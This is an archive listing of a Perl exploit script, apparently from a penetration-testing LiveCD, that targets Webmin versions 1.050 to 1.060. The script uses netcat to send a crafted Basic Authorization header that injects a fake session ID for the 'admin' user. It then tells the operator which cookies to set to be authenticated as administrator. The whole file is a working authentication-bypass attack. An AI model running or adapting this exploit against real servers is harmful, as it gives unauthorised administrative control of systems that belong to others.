home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / webmin / webmin-exploit.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  1.1 KB  |  40 lines
  1. #!/usr/bin/perl
  2. #
  3. # Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
  4. #
  5. # Inserts a fake session_id into the sessions list of webmin.
  6. # Does no error checking... if remote host is not found, no
  7. # error will be reported.
  8. #
  9.  
  10. print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
  11. print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";
  12.  
  13. $nc="/usr/bin/netcat";
  14.  
  15. if($#ARGV == -1) {
  16.     print "Syntax:\n\t$0 hostname\n";
  17.     exit(1);
  18. }
  19.  
  20. $hostname=$ARGV[0];
  21.  
  22. if ( ! -x $nc ) {
  23.     print "netcat not found!\n";
  24.     exit(2);
  25. }
  26.  
  27. open(NC, "|$nc $hostname 10000 >& /dev/null");
  28. print NC "GET / HTTP/1.1\n";
  29. print NC "Host: $hostname\n";
  30. print NC "User-agent: webmin\n";
  31. print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
  32. close(NC);
  33.  
  34. print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
  35. print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
  36. print "be authenticated to the webmin server!\n\n";
  37. print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
  38.  
  39.  
  40.